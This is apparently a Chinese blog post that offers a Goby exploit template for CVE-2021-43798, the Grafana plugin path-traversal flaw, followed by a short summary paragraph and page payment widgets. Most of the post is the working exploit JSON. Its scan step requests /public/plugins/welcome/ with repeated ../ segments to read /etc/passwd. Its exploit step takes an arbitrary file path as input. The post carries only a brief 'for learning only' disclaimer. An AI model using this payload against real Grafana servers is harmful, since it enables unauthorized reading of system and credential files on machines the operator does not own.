Grafana任意文件读取漏洞(CVE-2021-43798)

Grafana任意文件读取漏洞(CVE-2021-43798) goby exp

声明

本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。

代码

{
      "Name": "Grafana Plugins Arbitrary File Read CVE-2021-43798",
      "Level": "3",
      "Tags": [
            "fileread"
      ],
      "GobyQuery": "( app=\"Grafana\" | title==\"Grafana\" )",
      "Description": "Grafana是用于可视化大型测量数据的开源程序,他提供了强大和优雅的方式去创建、共享、浏览数据。dashboard中显示了你不同metric数据源中的数据。通过默认存在的插件,可构造特殊的请求包读取服务器任意文件。",
      "Product": "Grafana",
      "Homepage": "https://grafana.com/",
      "Author": "aetkrad",
      "Impact": "",
      "Recommendation": "",
      "References": [
            "https://mp.weixin.qq.com/s/DTkVTtbndaMWL9WGzaI32A"
      ],
      "HasExp": true,
      "ExpParams": [
            {
                  "Name": "Path",
                  "Type": "input",
                  "Value": "../../../../../../../../../etc/passwd"
            }
      ],
      "ExpTips": {
            "Type": "",
            "Content": ""
      },
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/public/plugins/welcome/../../../../../../../../../etc/passwd",
                        "follow_redirect": false,
                        "header": null,
                        "data_type": "text",
                        "data": "",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "root:x:",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "daemon:x:",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|lastbody|regex|"
                  ]
            }
      ],
      "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/public/plugins/welcome/{{{Path}}}",
                        "follow_redirect": false,
                        "header": null,
                        "data_type": "text",
                        "data": "",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|lastbody||"
                  ]
            }
      ],
      "PostTime": "2021-12-08 13:56:21",
      "GobyVersion": "1.9.310"
}

poc集合

地址:https://github.com/aetkrad/goby_poc
帮助到你的话给个星吧!

CVE-2021-43798是指Grafana中的未经授权的任意文件读取漏洞。攻击者可以利用这个漏洞读取系统上的敏感文件。\[1\] 为了利用这个漏洞,攻击者可以使用curl命令下载Grafana Enterprise 8.3.0版本的压缩包,并解压缩。\[2\]然后,可以使用提供的Python脚本exp.py来执行攻击。该脚本会尝试读取目标服务器上的/etc/passwd文件,以确认是否存在漏洞。\[3\] 需要注意的是,这个漏洞只会影响使用受影响版本的Grafana,并且需要攻击者能够与目标服务器建立连接才能利用漏洞。建议及时更新Grafana以修复这个漏洞,并确保服务器的安全配置和访问控制措施得到有效实施。 #### 引用[.reference_title] - *1* [CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞](https://blog.youkuaiyun.com/Jietewang/article/details/121961312)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [漏洞分析|CVE-2021-43798 - Grafana文件读取漏洞](https://blog.youkuaiyun.com/weixin_42508548/article/details/122061449)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2021-43798——Grafana 未授权任意文件读取](https://blog.youkuaiyun.com/weixin_44309905/article/details/122008606)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值